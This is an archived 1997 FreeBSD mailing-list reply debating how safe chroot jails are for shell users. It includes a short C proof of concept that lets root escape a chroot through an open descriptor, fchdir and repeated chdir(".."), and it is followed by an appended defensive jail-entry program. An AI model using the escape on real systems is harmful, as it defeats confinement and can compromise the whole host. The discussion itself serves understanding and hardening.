Date: Thu, 29 May 1997 09:16:10 -0600
From: Warner Losh <imp@village.org>
To: Terry Lambert <terry@lambert.org>
Cc: dec@phoenix.its.rpi.edu, peter@grendel.IAEhv.nl, mrcpu@cdsnet.net, hackers@freebsd.org
Subject: Re: Correct way to chroot for shell account users?
Message-ID: <E0wX6vy-0002fp-00@rover.village.org>
In-Reply-To: Your message of "Thu, 29 May 1997 07:56:26 PDT." <199705291456.HAA03526@phaeton.artisoft.com>
References: <199705291456.HAA03526@phaeton.artisoft.com>
In message <199705291456.HAA03526@phaeton.artisoft.com> Terry Lambert writes:
: 1) namei() refusing to traverse ".." from the chroot'ed
: root vnode (this is broken, but then almost all of
: namei() is broken, and no one cares but me...).
This works because the .. is outside the jail.
: 2) The chroot() call takes a path, which namei() will
: look up relative
Yes. That's true but irrelevant.
: 3) The link() system call in /sys/kern/vfs_syscalls.c has
: code to prevent hard links on directories:
:
: if (vp->v_type == VDIR)
: error = EPERM; /* POSIX */
:
: Not even root can do the hard link your method requires.
Right, that's what I said, but this is new.
: 4) You don't have to let them have an open fd to the original
: "/" when you throw them in jail.
Ummm, the "/" I was talking about was the new root (e.g. /jail in the
non-chroot'd system). You open up /, keep that fd around, then chroot
to someplace else lower in your current tree (e.g. /jail/xxx in the
non-chroot'd case, or /xxx in the chroot'd case). At this point the
fchdir would succeed in landing you outside the jail.
: 5) Calling chroot(2) is restricted to the superuser anyway,
: and only an idiot would try to put a root user in a
: chroot jail anyway (or put an ordinary user in a chroot
: jail with suid/sgid binaries).
100% correct. However, many people think that a chroot'd environment
is so safe that even root can't climb out. It isn't. If somehow a
user gets root in a chroot'd environment, then your entire machine can
be compromised.
Michael Smith posted the program to climb out of the jail here a few
months ago. This isn't theoretical, but it works. It was something
along the lines of the following. You can find it in the archives.
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

/* Run as root inside the jail: keep a descriptor to the jail's own root,
 * move the root one level down, then fchdir back and walk up with "..". */
int main(void)
{
    int fd;
    int i;

    mkdir("xxx", 0755);
    fd = open("/", O_RDONLY);
    chroot("/xxx");
    fchdir(fd);
    for (i = 0; i < 13; i++)   /* the posted version simply repeated chdir("..") */
        chdir("..");
    return 0;
}
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?E0wX6vy-0002fp-00>
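The defensive counterpart to the program above, as an added example that is not from this thread or from FreeBSD: enter_jail() and close_fds_above() are names made up here, and it assumes the jail directory and an unprivileged uid/gid are passed on the command line. It chdirs into the jail before chroot, closes every descriptor that could still reach the old tree, and drops root permanently (verifying the drop), so neither chroot(2) nor the fchdir trick is available to the jailed shell.

```c
#define _DEFAULT_SOURCE   /* glibc: declares chroot(2) and setgroups(2) */
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Close every descriptor above `keep`; returns how many were open.
 * The escape needs a directory descriptor from outside the jail, so
 * leave it nothing to fchdir(2) to. */
static int close_fds_above(int keep)
{
    long maxfd = sysconf(_SC_OPEN_MAX);
    int closed = 0;
    /* Assumption: cap the scan; use closefrom(2)/close_range(2) where available. */
    if (maxfd < 0 || maxfd > (1L << 20))
        maxfd = 1L << 20;
    for (long fd = keep + 1; fd < maxfd; fd++)
        if (close((int)fd) == 0)
            closed++;
    return closed;
}

/* Move the process into `dir` and drop to uid/gid for good.
 * Returns 0, or -1 with errno set. Refuses to leave root inside,
 * since root inside a chroot can always climb back out. */
static int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0) { errno = EINVAL; return -1; }
    if (chdir(dir) == -1 || chroot(dir) == -1 || chdir("/") == -1)
        return -1;                   /* cwd now sits inside the new root */
    close_fds_above(STDERR_FILENO);  /* no handle to the old tree survives */
    if (setgroups(0, NULL) == -1 || setgid(gid) == -1 || setuid(uid) == -1)
        return -1;
    /* Verify the drop stuck: if root can be regained, do not continue. */
    if (getuid() != uid || geteuid() != uid || setuid(0) == 0) { errno = EPERM; return -1; }
    return 0;
}

int main(int argc, char **argv)
{
    /* usage: jail <dir> <uid> <gid>; then runs the account's shell, jailed */
    if (argc != 4 || enter_jail(argv[1], (uid_t)atoi(argv[2]), (gid_t)atoi(argv[3])) == -1) {
        perror("enter_jail");
        return 1;
    }
    execl("/bin/sh", "sh", (char *)NULL);
    perror("execl");
    return 1;
}
```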
